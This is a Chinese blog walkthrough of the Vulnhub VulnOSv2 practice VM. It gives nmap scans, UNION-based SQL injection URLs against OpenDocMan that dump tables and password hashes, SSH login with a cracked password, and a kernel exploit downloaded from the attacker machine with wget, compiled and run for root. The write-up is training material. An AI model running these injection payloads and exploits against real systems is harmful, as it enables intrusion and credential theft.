首页 > 其他分享 >复现渗透Vulnhub-VulnOSv2靶机

复现渗透Vulnhub-VulnOSv2靶机

时间:2025-01-12 18:33:08浏览次数:3  
标签:http 60.174 VulnOSv2 jabcd0cs 192.168 odm 靶机 schema Vulnhub

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列VulnOSv2靶机有一定的了解

一、信息收集阶段

靶机地址:https://download.vulnhub.com/vulnos/VulnOSv2.7z


因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24 

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.174
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

二、攻击阶段

1、web目录枚举

dirb http://192.168.60.174 

2、登录jabcd0cs页面

http://192.168.60.174//jabcd0cs/

3、搜索历史漏洞

searchsploit opendocman |grep 1.2.7

4、下载利用exp

(1)下载exp查看
searchsploit opendocman  -m 32075.txt 

(2)访问注入点URL
http://192.168.60.174/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9

(3)爆库
http://192.168.60.174/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

#结果:# information_schema,drupal7,jabcd0cs,mysql,performance_schema,phpmyadmin

(4)爆表(jabcd0cs表)
http://192.168.60.174/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables 
where table_schema=database()

#结果:# odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms

(5)爆字段(jabcd0cs表),但是没有任何关于密码的字段
http://192.168.60.174/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns 
where table_schema=database() and table_name=odm_user

(6)爆字段(jabcd0cs表)将字段替换成16进制爆破
http://192.168.60.174/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns 
where table_schema=database() and table_name=0x6f646d5f75736572

#结果:id,username,password,department,phone,Email,last_name,first_name,pw_reset_code

(7)查密码
http://192.168.60.174/jabcd0cs/ajax_udf.php
?q=1
&add_value=odm_user%20UNION%20SELECT%201,
group_concat(username,password),3,4,5,6,7,8,9 from odm_user
#结果:
#webmin
#b78aae356709f8c31118ea613980954b # webmin1980
#guest
#084e0343a0486ff05530df6c705c8bb4 # guest

5、ssh连接

通过sql注入已知账号:webmin 密码:webmin1980

ssh webmin@192.168.60.174 

三、提权阶段

1、python创建bin/bash终端

python -c "import pty;pty.spawn('/bin/bash')"

2、收集内核信息

lsb_release -a
uname -a

searchsploit  14.04 |grep 3.13

3、攻击机下载提权EXP

searchsploit  14.04 -m 37292.c 

4、攻击机开启http微服务

python -m http.server 8088

5、靶机下载exp

cd /tmp  #切换到tmp目录
wget http://192.168.60.128:8088/37292.c

6、靶机编译exp

gcc -o exp 37292.c
./exp






标签:http,60.174,VulnOSv2,jabcd0cs,192.168,odm,靶机,schema,Vulnhub
From: https://blog.csdn.net/weixin_46926338/article/details/144980406

相关文章

  • Vulnhub-Red靶机笔记
    Red靶机笔记概述这台靶机主要练习了文件包含漏洞的利用过程,以及hashcat利用规则生成字典来爆破ssh,利用进程监听修改root自执行程序来拿到root权限的shell靶机地址:https://www.vulnhub.com/entry/red-1,753/一、nmap扫描1、端口扫描sudonmap-sT--min-rate10000-p--opo......
  • vulnhub靶场【DC系列】之9 the final 结束篇
    前言靶机:DC-8,IP地址为192.168.10.11,后续因为靶机重装,IP地址变为192.168.10.13攻击:kali,IP地址为192.168.10.2都采用VMWare,网卡为桥接模式对于文章中涉及到的靶场以及工具,我放置在网盘中,链接:https://pan.quark.cn/s/54b7df0c84e1主机发现使用arp-scan-l或者netdiscover......
  • vulnhub中deathnote1靶机
    信息收集靶机开机后,按e键进入安全模式修改下图位置为:rwsignieinit=/bin/bash 按ctrl+x进入bashvi /etc/network/interfaces 修改下图两个位置为ens33注意x是删除i是输入然后退出 打开kali识别存活主机(也就是识别攻击目标):arp-scan-l端口扫描:nmap-sV-p-......
  • 【vulnhub靶场】日志投毒与文件包含漏洞 Solstice
    一、侦查1.1收集目标网络信息:IP地址1.2主动扫描:扫描IP地址段二、初始访问2.1利用面向公众的应用三、权限提升3.1利用漏洞提权:高权限运行的程序一、侦查1.1收集目标网络信息:IP地址靶机启动后,没有提供IP地址。由于Kali和靶机在同一个C段,可以扫描ARP......
  • vulnhub——Potato靶机
    还是使用arp-scan-l查找ip第一信息收集访问一下网页只有一个土豆没有什么有用的信息使用dirb扫描一下目录得到了三个页面我们访问一下没有什么有用的信息我们继续扫描一下端口发现页面开启了80端口还开启了7120端口(ssh)结合刚才的网页是一个土豆,可以猜......
  • Vulnhub靶场(potato-suncsr)
    项目地址https://www.vulnhub.com/entry/potato-suncsr-1,556/搭建靶机官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-l获取靶机IP192.168.131.185信息收集nmap-A-p-192.168.131.185dirbhttp://192.168.131.185/一个土豆子一个phpi......
  • Potato靶机
    靶机ip:192.168.75.135我们还是使用arp-scan-l查找ip第一步信息收集我们访问一下网页只有一个土豆没有什么有用的信息使用dirb扫描一下目录得到了三个页面我们访问一下没有什么有用的信息我们继续扫描一下端口发现页面开启了80端口还开启了7120端......
  • vulnhub靶机--potato
    nat模式打开靶机扫Ip访问IP得到一张土豆页面扫端口nmap-A-p-192.168.146.158发现80和7120端口使用的是ubuntu服务器访问7120端口扫目录爆破ssh7120端口hydrassh://192.168.146.158:7120-lpotato-P/usr/share/wordlists/john.lst-vV-f-t32......
  • HackMyVM-Alive靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、主机探索/opt目录/vat/www/code的web渗透4、提权写入webshellUDF提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(19......
  • vulnhub——Earth靶机
    使用命令在kali查看靶机iparp-scan-l尝试访问ip尝试使用御剑扫描子域名什么也没有尝试扫描端口nmap-Aip获得443端口的域名,以及dnsvim/etc/hostsearth.localterratest.earth.local尝试访问,在kali中访问dirb扫描一下发现子域名尝试访问一下ht......